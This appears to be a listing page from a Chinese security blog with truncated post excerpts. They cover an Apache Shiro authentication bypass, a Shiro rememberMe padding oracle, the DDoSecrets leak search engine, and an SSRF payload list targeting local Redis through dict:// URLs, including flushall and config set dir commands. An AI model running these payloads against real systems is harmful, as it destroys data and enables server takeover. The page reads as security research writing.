Apache Shiro before 1.5.2, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.
...继续阅读
(5)
先给payload:dict://127.0.0.1:6379/info // 测试ssrfdict://127.0.0.1:6379/flushalldict://127.0.0.1:6379/config set dir /scriptsdict://127.0.0.1:6379/config set dbfile
...继续阅读
(7)
Description[5]The cookie rememberMe is encrypted by AES-128-CBC mode, and this can be vulnerable to padding oracle attacks. Attackers can use a vaild rememberMe cookie as th
...继续阅读
(2)
libraryofleaks是由分布式拒绝秘密组织(Distributed Denial of Secrets,简称DDoSecrets)推出的一个公共搜索引擎,被称为“泄密库”(Library of Leaks),这个平台允许用户搜索数百万份来自数十起泄密事件的文件,而且每天都会添加更多
...继续阅读
(6)